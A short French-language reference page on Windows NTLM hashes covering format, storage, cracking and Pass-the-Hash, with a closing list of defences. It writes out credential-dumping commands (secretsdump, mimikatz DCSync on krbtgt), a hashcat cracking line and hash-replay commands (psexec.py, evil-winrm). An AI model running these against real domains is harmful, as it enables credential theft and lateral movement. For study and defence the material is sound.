NTLM — Hash d'authentification Windows

Windows AD

Présentation

NTLM (NT hash) est le hash des mots de passe Windows : MD4 du mot de passe en UTF-16-LE, sans sel. Stocké dans la base SAM/NTDS.dit. Vulnérable aux rainbow tables et au Pass-the-Hash.

Extraction & crack

# Extraction (Active Directory)
secretsdump.py domain/user@dc -just-dc
mimikatz: lsadump::dcsync /user:krbtgt

# Crack
hashcat -m 1000 ntlm.txt rockyou.txt

Pass-the-Hash

# Pas besoin de cracker : rejouer le hash
psexec.py -hashes :NTLM_HASH domain/user@target
evil-winrm -i target -u user -H NTLM_HASH

Défenses

Mots de passe longs (≥15 car. cassent LM), désactiver LM/NTLMv1, activer Credential Guard, et restreindre l'authentification NTLM au profit de Kerberos.